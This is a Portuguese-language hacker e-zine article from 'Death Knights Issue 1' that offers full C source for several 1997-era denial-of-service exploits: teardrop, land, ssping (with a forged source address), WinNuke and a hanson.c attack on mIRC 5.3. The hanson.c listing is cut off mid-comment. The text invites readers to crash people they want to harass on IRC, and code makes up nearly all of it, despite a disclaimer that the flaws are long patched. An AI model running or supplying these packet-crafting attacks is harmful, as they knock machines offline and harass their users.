PHUN STUFF TO USE @ iRC!
Death Knights Issue 1
by Cacaio
O iRC e' feito basicamente para o chat, mas as vezes voce encontra alguem que voce quer sacanear por la', ou so por diversao... e nao sabe o que fazer. Mas agora direi alguns metodos de como voce se divertir! Os codigos seguintes podem ser usados tanto contra alguem no iRC quanto contra qualquer maquina que voce saiba que esta na net... Aviso: todos os programas abaixo sao ataques de negacao de servico (DoS) contra falhas de 1997/98 que ja foram corrigidas ha muito tempo, entao hoje so servem como material historico ou de laboratorio. Quase todos precisam de root (raw sockets) e usa-los contra uma maquina sem autorizacao do dono e' ilegal na maioria dos paises.
SUBSECOES:
- TEARDROP
- LAND
- SSPING
- WINNUKE
- HANSON
TEARDROP
O teardrop e' um codigo que aproveita um bug na remontagem de fragmentos iP (fragmentos que se sobrepoem) encontrado nas kernels de Linux mais antigas (2.0.x), WinNT 4.0 e Win95 sem o patch, entre outros... O codigo seguinte pode ser usado tanto em Linux quanto em FreeBSD, mas precisa de root para abrir o raw socket, e em FreeBSD (e outros BSDs antigos) deve ser compilado com -DSTRANGE_BSD_BYTE_ORDERING_THING, senao os campos de tamanho e offset do cabecalho IP saem na ordem de bytes errada (veja o #ifdef no comeco do fonte). Vamos ao codigo...
[teardrop.c]
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
/*
* Copyright (c) 1997 route|daemon9 <route@infonexus.com> 11.3.97
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
/* On these kernels the IP total-length and fragment-offset fields handed to
 * a raw socket are NOT byte-swapped, so FIX() is the identity. Build with
 * -DSTRANGE_BSD_BYTE_ORDERING_THING on those systems. */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
/* Everywhere else the two fields go out in network byte order. */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000   /* "more fragments" bit of the IP flags/offset field */
#define IPH 0x14       /* IP header length without options: 20 bytes */
#define UDPH 0x8       /* UDP header length: 8 bytes */
#define PADDING 0x1c   /* UDP payload bytes (28) carried by the first fragment */
#define MAGIC 0x3      /* fragment offset of the second fragment in 8-byte units
                        * (byte 24); send_frags() gives it IPH + MAGIC + 1 = 24
                        * bytes total, i.e. 4 payload bytes that land entirely
                        * inside the first fragment's 36-byte UDP portion */
#define COUNT 0x1      /* default number of fragment pairs to send (-n) */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);   /* declared here but never defined in this listing */
void send_frags(int, u_long, u_long, u_short, u_short);
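/*
 * teardrop entry point: "src_ip dst_ip [-s src_prt] [-t dst_prt] [-n count]".
 *
 * Resolves both addresses, opens a raw IP socket with IP_HDRINCL (a
 * privileged operation: root / CAP_NET_RAW) and sends `count` overlapping
 * fragment pairs via send_frags(), 500 us apart. Returns 0 when done; exits
 * with status 1 on a resolution, socket or option error, and via usage()
 * (status 0) on a bad command line.
 *
 * Changes vs. the original:
 *  - the option scan starts after the two positional arguments (argv + 2),
 *    so it also works with a getopt() that stops at the first non-option
 *    (BSD); before, -s/-t/-n were silently ignored on such systems;
 *  - the command line is validated before the raw socket is opened, so a
 *    usage error does not first fail with "raw socket: Operation not
 *    permitted" for non-root users;
 *  - ports are range-checked (0..65535, 0 meaning "pick one at random")
 *    instead of being truncated, and a random port is never 0;
 *  - a non-positive -n falls back to COUNT instead of sending nothing;
 *  - the socket is closed before returning.
 */
int main(int argc, char **argv)
{
    int one = 1, count = 0, opt, i, rip_sock;
    long val;
    u_long src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    fprintf(stderr, "teardrop route|daemon9\n\n");

    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve((u_char *)argv[1]))
        || !(dst_ip = name_resolve((u_char *)argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    /* Options follow the two positional arguments; argv[2] plays the role
     * of argv[0] for getopt(), which starts scanning at index 1. */
    while ((opt = getopt(argc - 2, argv + 2, "s:t:n:")) != -1)
    {
        switch (opt)
        {
        case 's': /* source port (should be ephemeral); 0 = random */
        case 't': /* destination port (DNS, anyone?); 0 = random */
            val = atol(optarg);
            if (val < 0 || val > 0xffff)
            {
                fprintf(stderr, "port must be 0..65535 (0 = random)\n");
                exit(1);
            }
            if (opt == 's') src_prt = (u_short)val;
            else dst_prt = (u_short)val;
            break;
        case 'n': /* number of fragment pairs to send */
            count = atoi(optarg);
            break;
        default:
            usage(argv[0]);
            break; /* NOTREACHED */
        }
    }

    if ((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        perror("raw socket");
        exit(1);
    }
    /* We build the IP header ourselves; tell the kernel not to prepend one. */
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0)
    {
        perror("IP_HDRINCL");
        exit(1);
    }

    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (u_short)(1 + random() % 0xfffe);   /* 1..65535 */
    if (!dst_prt) dst_prt = (u_short)(1 + random() % 0xfffe);
    if (count <= 0) count = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");
    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
        usleep(500);
    }
    fprintf(stderr, "]\n");
    close(rip_sock);
    return (0);
}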
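/*
 * Build and send one teardrop fragment pair on raw socket `sock` (which must
 * have IP_HDRINCL set: the buffer starts with the IP header we write here).
 *
 *  fragment 1: IP header (id 242, MF set, offset 0) + UDP header + PADDING
 *              zero bytes, IPH + UDPH + PADDING = 56 bytes in total;
 *  fragment 2: the same buffer re-labelled with total length IPH + MAGIC + 1
 *              = 24 and fragment offset MAGIC (= byte 24, MF clear), i.e. a
 *              4-byte payload that ends at byte 28, inside fragment 1's
 *              36-byte UDP portion. That overlap is what the vulnerable
 *              reassembly code mishandled.
 *
 * The IP checksum is left 0 for the kernel to fill in; the UDP checksum is
 * left 0, which for UDP over IPv4 means "no checksum". src_ip/dst_ip are
 * already in network byte order (see name_resolve); only their low 32 bits
 * are used. Exits with status 1 if malloc() or either sendto() fails, as the
 * original did for sendto().
 *
 * Changes vs. the original: malloc() is checked; the TTL is written as one
 * byte (the original stored a u_short at the TTL offset, which yields TTL 0
 * on big-endian hosts); every multi-byte field is stored with memcpy(), so
 * there are no type-punned u_short/u_long stores (the u_long store of the
 * addresses wrote 8 bytes on LP64 and only worked because later stores
 * overwrote the spill); sin is zero-initialised.
 */
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
{
    const size_t frag1_len = IPH + UDPH + PADDING;   /* 56 bytes */
    const size_t frag2_len = IPH + MAGIC + 1;        /* 24 bytes */
    u_char *packet, *ip, *udp;
    u_short w16;
    in_addr_t a32;
    struct sockaddr_in sin;

    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = src_prt;               /* not used by the kernel for raw IP */
    sin.sin_addr.s_addr = (in_addr_t)dst_ip;

    packet = malloc(frag1_len);
    if (packet == NULL)
    {
        perror("\nmalloc");
        exit(1);
    }
    memset(packet, 0, frag1_len);
    ip = packet;
    udp = packet + IPH;

    /* IP header, byte offsets per RFC 791 */
    ip[0] = 0x45;                                 /* version 4, IHL 5 words */
                                                  /* ip[1]: TOS stays 0 */
    w16 = FIX(IPH + UDPH + PADDING);              /* 2-3: total length */
    memcpy(ip + 2, &w16, sizeof(w16));
    w16 = htons(242);                             /* 4-5: id, shared by both fragments */
    memcpy(ip + 4, &w16, sizeof(w16));
    w16 = FIX(IP_MF);                             /* 6-7: MF set, offset 0 */
    memcpy(ip + 6, &w16, sizeof(w16));
    ip[8] = 0x40;                                 /* TTL 64 */
    ip[9] = IPPROTO_UDP;                          /* protocol */
                                                  /* 10-11: checksum, kernel fills it */
    a32 = (in_addr_t)src_ip;                      /* 12-15: source address */
    memcpy(ip + 12, &a32, sizeof(a32));
    a32 = (in_addr_t)dst_ip;                      /* 16-19: destination address */
    memcpy(ip + 16, &a32, sizeof(a32));

    /* UDP header */
    w16 = htons(src_prt);
    memcpy(udp + 0, &w16, sizeof(w16));
    w16 = htons(dst_prt);
    memcpy(udp + 2, &w16, sizeof(w16));
    w16 = htons(UDPH + PADDING);                  /* UDP length = header + payload */
    memcpy(udp + 4, &w16, sizeof(w16));
                                                  /* udp[6-7]: checksum 0 = none */

    if (sendto(sock, packet, frag1_len, 0, (struct sockaddr *)&sin,
               sizeof(sin)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /* Second fragment: shrink the datagram and move it to offset MAGIC so it
     * overlaps the first one; MF is clear, so this is the "last" fragment. */
    w16 = FIX(IPH + MAGIC + 1);
    memcpy(ip + 2, &w16, sizeof(w16));
    w16 = FIX(MAGIC);
    memcpy(ip + 6, &w16, sizeof(w16));

    if (sendto(sock, packet, frag2_len, 0, (struct sockaddr *)&sin,
               sizeof(sin)) == -1)
    {
        perror("\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}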
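/*
 * Resolve a dotted-quad string or a host name to an IPv4 address in network
 * byte order. Returns 0 on failure, so 0.0.0.0 cannot be distinguished from
 * an error (as in the original). inet_addr() is tried first and the resolver
 * only when that fails; because inet_addr() signals failure with INADDR_NONE
 * (255.255.255.255), that one address always goes to the resolver.
 *
 * Changes vs. the original: uses h_addr_list[0] (h_addr is a BSD-compat
 * macro missing under strict ISO C), memcpy() instead of bcopy(), checks the
 * address family, and never copies more than sizeof(addr.s_addr) bytes.
 */
u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;
    const char *name = (const char *)host_name;
    size_t n;

    addr.s_addr = inet_addr(name);
    if (addr.s_addr == INADDR_NONE)
    {
        host_ent = gethostbyname(name);
        if (host_ent == NULL || host_ent->h_addrtype != AF_INET
            || host_ent->h_addr_list[0] == NULL)
            return (0);
        n = (size_t)host_ent->h_length;
        if (n > sizeof(addr.s_addr)) n = sizeof(addr.s_addr);
        memcpy(&addr.s_addr, host_ent->h_addr_list[0], n);
    }
    return (addr.s_addr);
}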
/* Print the command-line synopsis to stderr and terminate. Exit status is 0
 * even when reached because of a bad argument (kept from the original). */
void usage(u_char *name)
{
    fprintf(stderr, "%s src_ip dst_ip", name);
    fputs(" [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", stderr);
    exit(0);
}
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
LAND
Este e' bem divertido... hehehe... o que acontece? Voce manda um pacote TCP SYN em que o endereco e a porta de origem sao exatamente os de destino (o proprio alvo, numa porta aberta); a pilha TCP vulneravel fica respondendo a si mesma, entrando em loop e paralisando a maquina! A pena e' que se o usuario tiver paciencia para esperar uns 100 segundos, a maquina voltara a funcionar (valeu Sabrina!).
Lista dos OS's vulneraveis (na epoca, final de 1997 - todos ja receberam correcao ha muito tempo):
- BSDI 2.1
- FreeBSD 2.2.2-RELEASE
- FreeBSD 2.2.5-RELEASE
- FreeBSD 2.2.5-STABLE
- FreeBSD 3.0-CURRENT
- HP-UX 10.20
- MacOS 8.0
- NetBSD 1.2
- NeXTSTEP 3.0
- NeXTSTEp 3.1
- OpenBSD 2.1
- Solaris 2.5.1
- SunOS 4.1.4
- Windows 95
- Windows NT
E aqui o codigo! (Obs.: ele foi escrito para a libc5 e inclui <netinet/ip_tcp.h> e <netinet/protocols.h>, que nao existem na glibc moderna; la' use <netinet/tcp.h>, troque IP_TCP por IPPROTO_TCP e inclua <unistd.h> por causa do close().)
[land.c]
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
/* land.c by m3lt, FLC
crashes a win95 box */
#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
/* TCP pseudo-header (RFC 793) immediately followed by the TCP header, laid
 * out so that checksum() can sweep the whole thing in one pass: main() zeroes
 * it, fills the first 12 bytes, copies the TCP header in and checksums
 * 12 + sizeof(struct tcphdr) bytes. */
struct pseudohdr
{
struct in_addr saddr;      /* source address (for LAND: the target itself) */
struct in_addr daddr;      /* destination address (the same) */
u_char zero;               /* always 0 */
u_char protocol;           /* 6 = TCP */
u_short length;            /* TCP header + data length, network order */
struct tcphdr tcpheader;   /* copy of the header being checksummed */
};
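/*
 * 16-bit one's-complement checksum (RFC 1071) over `length` bytes at `data`,
 * used by main() for the TCP checksum over pseudo-header + TCP header. Words
 * are summed in host byte order; the result is correct as long as it is
 * stored back in the same memory order, which is the case here.
 *
 * Bugs fixed vs. the original: the accumulator was never initialised
 * (undefined behaviour; the checksum depended on whatever was on the stack);
 * an odd trailing byte was taken from a full 16-bit read one byte past the
 * buffer and placed in the wrong half of the word; the end-around carry was
 * folded only once, which can leave a carry bit for long buffers. land.c
 * itself only calls this with an even length (32).
 */
u_short checksum(u_short * data,u_short length)
{
    unsigned long sum = 0;
    u_short i;

    for (i = 0; i < (u_short)(length >> 1); i++)
        sum += data[i];

    if (length & 1) {
        /* Odd trailing byte: treat it as the first byte of a zero-padded
         * word, exactly as it sits in memory. */
        u_short last = 0;
        *(u_char *)&last = ((u_char *)data)[length - 1];
        sum += last;
    }

    while (sum >> 16)                    /* fold carries until none remain */
        sum = (sum & 0xffff) + (sum >> 16);

    return (u_short)~sum;
}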
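/*
 * land entry point: "land IP port". Builds one TCP SYN whose source address
 * and port equal its destination address and port (the target's), and sends
 * it once through a raw socket (root / CAP_NET_RAW needed). Returns 0 on
 * success, -1 on any error.
 *
 * Changes vs. the original: resolution keeps the gethostbyname()-then-
 * inet_addr() order but uses h_addr_list[0] and INADDR_NONE (h_addr is a
 * BSD-only macro and comparing an unsigned in_addr_t with -1 is fragile);
 * the port is range-checked (before, "70000" was silently wrapped); the
 * protocol number comes from IPPROTO_TCP in <netinet/in.h> instead of IP_TCP
 * from the non-standard <netinet/protocols.h>; IP_HDRINCL is set explicitly
 * so the kernel treats the buffer as a complete IP header on every platform
 * rather than relying on IPPROTO_RAW implying it.
 */
int main(int argc,char * * argv)
{
    struct sockaddr_in sin;
    struct hostent * hoste;
    int sock, one = 1, portnum;
    char buffer[40];                     /* 20-byte IP + 20-byte TCP header */
    struct iphdr * ipheader=(struct iphdr *) buffer;
    struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
    struct pseudohdr pseudoheader;

    fprintf(stderr,"land.c by m3lt, FLC\n");

    if(argc<3)
    {
        fprintf(stderr,"usage: %s IP port\n",argv[0]);
        return(-1);
    }

    bzero(&sin,sizeof(struct sockaddr_in));
    sin.sin_family=AF_INET;
    if((hoste=gethostbyname(argv[1]))!=NULL && hoste->h_addrtype==AF_INET
       && hoste->h_addr_list[0]!=NULL)
        bcopy(hoste->h_addr_list[0],&sin.sin_addr,sizeof(sin.sin_addr));
    else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==INADDR_NONE)
    {
        fprintf(stderr,"unknown host %s\n",argv[1]);
        return(-1);
    }

    portnum=atoi(argv[2]);
    if(portnum<=0||portnum>65535)
    {
        fprintf(stderr,"unknown port %s\n",argv[2]);
        return(-1);
    }
    sin.sin_port=htons((u_short)portnum);

    if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))==-1)
    {
        fprintf(stderr,"couldn't allocate raw socket\n");
        return(-1);
    }
    if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,&one,sizeof(one))==-1)
    {
        fprintf(stderr,"couldn't set IP_HDRINCL\n");
        close(sock);
        return(-1);
    }

    /* IP header: checksum left 0 for the kernel; src == dst is the point. */
    bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->version=4;
    ipheader->ihl=sizeof(struct iphdr)/4;
    ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->id=htons(0xF1C);
    ipheader->ttl=255;
    ipheader->protocol=IPPROTO_TCP;
    ipheader->saddr=sin.sin_addr.s_addr;
    ipheader->daddr=sin.sin_addr.s_addr;

    /* TCP header: SYN with identical source and destination port. */
    tcpheader->th_sport=sin.sin_port;
    tcpheader->th_dport=sin.sin_port;
    tcpheader->th_seq=htonl(0xF1C);
    tcpheader->th_flags=TH_SYN;
    tcpheader->th_off=sizeof(struct tcphdr)/4;
    tcpheader->th_win=htons(2048);

    /* TCP checksum over pseudo-header + header (no payload). */
    bzero(&pseudoheader,12+sizeof(struct tcphdr));
    pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.protocol=6;
    pseudoheader.length=htons(sizeof(struct tcphdr));
    bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
    tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

    if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
    {
        fprintf(stderr,"couldn't send packet\n");
        close(sock);
        return(-1);
    }

    fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);
    close(sock);
    return(0);
}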
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
SSPING
Super Sized PiNG... precisa dizer mais algo? :)
(ah, funciona em Windows e em algumas versoes do MacOs sem as correcoes de 1997; o programa manda pares de fragmentos ICMP malformados que se sobrepoem, com endereco de origem forjado, e precisa de root para o raw socket)
[ssping.c]
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
/* Print the program banner (name, version, author) to stdout. */
void banner(void) {
    fputs("\nSSPING 1.0\n", stdout);
    fputs("by Datagram.\n\n", stdout);
}
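/*
 * Print the command-line help to stdout. `progname` is argv[0].
 *
 * The listing as published printed only "%s ..." on the synopsis line and
 * the operand names had been mangled to " < spoof > " by whatever extracted
 * the text, so the operand order was never shown. The three operands are
 * printed here in the order main() consumes them: argv[1] = spoof,
 * argv[2] = dest, argv[3] = number.
 */
void usage(const char *progname) {
    printf("usage :\n");
    printf("%s <spoof> <dest> <number>\n",progname);
    printf(" <spoof>  : address of ICMP packet sender\n");
    printf(" <dest>   : destination of the ICMP packet\n");
    printf(" <number> : number of bomb to send\n\n");
}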
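/*
 * Fill *addr with an AF_INET sockaddr for `name` (dotted quad or host name)
 * and `port` (host order; narrowed to 16 bits). Returns 0 on success, -1
 * after printing an error when the name cannot be resolved. inet_addr() is
 * tried first, so "255.255.255.255" (== INADDR_NONE) is always handed to the
 * resolver instead.
 *
 * Changes vs. the original: INADDR_NONE instead of comparing an unsigned
 * value with -1, h_addr_list[0] instead of the BSD-only h_addr macro, the
 * address family is checked to be AF_INET, and exactly sizeof(sin_addr)
 * bytes are copied.
 */
int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {
    struct hostent *host;
    memset(addr,0,sizeof(struct sockaddr_in));
    addr->sin_family = AF_INET;
    addr->sin_addr.s_addr = inet_addr(name);
    if (addr->sin_addr.s_addr == INADDR_NONE) {
        host = gethostbyname(name);
        if (host == NULL || host->h_addrtype != AF_INET
            || host->h_addr_list[0] == NULL) {
            fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);
            return(-1);
        }
        memcpy(&addr->sin_addr,host->h_addr_list[0],sizeof(addr->sin_addr));
    }
    addr->sin_port = htons(port);
    return(0);
}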
/* Classic BSD Internet checksum (RFC 1071): one's-complement sum of the
 * 16-bit words in `addr[0..len)`, an odd trailing byte padded with zero in
 * memory order, carries folded twice, result complemented. Used for both the
 * IP header and the ICMP checksum in send_winbomb(). */
unsigned short in_cksum(u_short *addr, int len)
{
    unsigned long total = 0;
    u_short tail = 0;
    const u_short *cursor = addr;
    int remaining;

    for (remaining = len; remaining > 1; remaining -= 2)
        total += *cursor++;

    if (remaining == 1) {
        *(u_char *)&tail = *(const u_char *)cursor;
        total += tail;
    }

    total = (total >> 16) + (total & 0xffff);   /* fold the high half in */
    total += (total >> 16);                     /* ... and any carry from that */
    return (u_short)~total;
}
int send_winbomb(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr) {
unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
int rc;
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip->ihl = 5;
ip->version = 4;
// ip->tos = 0;
ip->id = htons(34717);
ip->frag_off |= htons(0x2000);
// ip->tot_len = 0;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 0;
icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1);
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 1,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip->frag_off = htons(8 >> 3);
ip->frag_off |= htons(0x2000);
ip->check = in_cksum(ip, sizeof(struct iphdr));
icmp->type = 0;
icmp->code = 0;
icmp->checksum = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
return(0);
}
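/*
 * ssping entry point: "<spoof> <dest> <number>". Resolves both addresses,
 * opens a raw socket (root / CAP_NET_RAW) and calls send_winbomb() `number`
 * times, 10 ms apart. Returns 0 on completion, -1 on a usage, resolution,
 * socket or send error.
 *
 * Bugs fixed vs. the original: `sock` was declared unsigned, so the
 * `< 0` test never fired and a failed socket() went undetected; the packet
 * count was re-parsed with atoi() on every loop iteration and compared as
 * unsigned, so a negative count looped ~4 billion times; the socket is now
 * closed and main() returns a value on the normal path.
 */
int main(int argc, char * *argv) {
    struct sockaddr_in dest_addr;
    unsigned long src_addr;
    int sock;
    long count, i;

    banner();
    if ((argc != 4)) {
        usage(argv[0]);
        return(-1);
    }

    count = atol(argv[3]);
    if (count < 0) {
        fprintf(stderr,"ERROR: number of packets must not be negative.\n");
        return(-1);
    }

    if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
    src_addr = dest_addr.sin_addr.s_addr;           /* forged source */
    if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }

    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        fprintf(stderr,"ERROR: Opening raw socket.\n");
        return(-1);
    }

    printf("%s: Sending packets.\n",argv[0]);
    for (i = 0; i < count; i++) {
        if (send_winbomb(sock,
                         src_addr,
                         &dest_addr) == -1) {
            fprintf(stderr,"ERROR: Sending packet.\n");
            close(sock);
            return(-1);
        }
        usleep(10000);
    }
    close(sock);
    return(0);
}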
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
WiNNUKE
Whooommm....[bocejo]... este eh o treco que manda dados OOB (segmento TCP com a flag URG) pro Windows 95/NT sem o patch e ele trava com uma tela azul... o padrao do programa e' a porta 139 (NetBIOS); o texto original cita a porta 59 pro NT, mas o WinNuke classico ataca a 139 nos dois - escolha com -p.
[killwin.c]
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
/* Shared state: x and y are loop counters (main's send loop / parse_args's
 * argv scan), sockdesc the TCP socket, port the target port (default 139),
 * hits how many OOB sends to make (default 1), target argv[1] and str the
 * six-byte payload sent with MSG_OOB. */
int x, y, sockdesc, port = 139, hits = 1;
char *target, *str = "Later.";
void parse_args(int argc, char *argv[]);   /* sets target/port/hits from argv */
/* Print the synopsis to stdout and terminate with status -1 (255). */
void usage(char *progname) {
    fprintf(stdout, "Usage: %s <target> [-p port (Default 139)] [-t hits (Default 1)]\n", progname);
    exit(-1);
}
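/*
 * Parse "<target> [-p port] [-t hits]" into the globals target, port and
 * hits. The caller guarantees argc >= 2. Exits with -1 when argv[1] looks
 * like an option, when -p/-t lacks its value, or when the port is outside
 * 1..65535.
 *
 * Bugs fixed vs. the original: "-p" or "-t" as the last argument made the
 * code read argv[argc] (NULL) and pass it to atoi(), crashing; an
 * out-of-range port was silently truncated by htons() in main().
 */
void parse_args(int argc, char *argv[]) {
    int k;

    target = argv[1];
    if (argv[1][0] == '-') {
        printf("Must specify a target.\n");
        exit(-1);
    }
    for (k = 2; k < argc; k++) {
        if (!strcmp(argv[k], "-p")) {
            if (k + 1 >= argc) {
                printf("-p needs a port number.\n");
                exit(-1);
            }
            port = atoi(argv[++k]);
            if (port <= 0 || port > 65535) {
                printf("Invalid port.\n");
                exit(-1);
            }
        } else if (!strcmp(argv[k], "-t")) {
            if (k + 1 >= argc) {
                printf("-t needs a count.\n");
                exit(-1);
            }
            hits = atoi(argv[++k]);
        }
    }
}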
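/*
 * WinNuke entry point: connects to target:port over TCP and sends the
 * 6-byte string `hits` times as urgent (MSG_OOB) data, waits a second and
 * exits. Returns 0 on completion; exits with -1 on usage, resolution,
 * socket or connect failure.
 *
 * Bugs fixed vs. the original: `void main` is now `int main`; sin is
 * zeroed before use; a failed gethostbyname() only printed a (meaningless,
 * errno-based) message and then connected to an uninitialised address, it
 * now aborts; h_addr_list[0] replaces the BSD-only h_addr macro; a failed
 * send() stops the loop instead of being ignored.
 */
int main(int argc, char *argv[]) {
    struct sockaddr_in sin;
    struct hostent *he;

    if (argc < 2) usage(argv[0]);
    parse_args(argc, argv);

    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    he = gethostbyname(target);
    if (he == NULL || he->h_addrtype != AF_INET || he->h_addr_list[0] == NULL) {
        fprintf(stderr, "Resolving: cannot resolve %s\n", target);
        exit(-1);
    }
    memcpy(&sin.sin_addr, he->h_addr_list[0], sizeof(sin.sin_addr));

    sockdesc = socket(AF_INET, SOCK_STREAM, 0);
    if (sockdesc < 0) {
        perror("socket");
        exit(-1);
    }
    if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        perror("connect");
        close(sockdesc);
        exit(-1);
    }
    printf("Connected to [%s:%d].\n", target, port);
    printf("Sending crash %d times...\n", hits);
    for (x = 0; x < hits; x++) {
        if (send(sockdesc, str, strlen(str), MSG_OOB) < 0) {
            perror("send");
            break;
        }
    }
    sleep(1);   /* give the peer time to process the urgent data before we close */
    printf("Done....\n");
    close(sockdesc);
    return 0;
}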
HANSON
O hanson.c e' somente um codigozinho que usa uma falha no tratamento dos sockets em escuta (bound sockets) do mIRC 5.3... voce deve usar contra a porta em que o mIRC da vitima esta escutando. Use a 113 (identd do mIRC) ou a 69. O programa abre 5 conexoes TCP e manda a mesma string 1000 vezes em cada uma (veja o main). Have fun! :)
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------
/* hanson.c - by myn with help from h2o and watcher *thanks*
This lil program exploits mIRC's bound sockets, making the client crash
mIRC can handle a mass influx of data but cannot handle strings of data
that are parsed internally through mIRC. This program forces mIRC to
parse incoming data and identify it, the result from the parse
is larger then mIRC's buffer string size, thus making the
client crash :). This will create 5 connections to the bound port and
then send the string.
Its like sending double "int" when you only had 1 bit to work with!
hanson.c is dedicated to all the lil 13 to 16 year old geeks (abyss)
that are in love with those cute boys..
myn@efnet
*/
/* FILE GOT IN THE DEATH KNIGHTS! www.deathknights.com */
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
/* File-scope state: s is the current TCP socket, i the send-loop counter and
 * p the parsed target port. x, dport, addr, spoofedaddr and host are never
 * referenced anywhere in this listing. */
int x, s, i, p, dport;
/* SET STRING HERE */
/* Payload written 1000 times per connection: a long run of '9's, " * ",
 * another run of '9's. Why this particular text upsets mIRC 5.3 is only
 * asserted in the header comment ("result from the parse is larger then
 * mIRC's buffer string size"); nothing here verifies it. */
char *str = "9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 * 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999";
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
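/*
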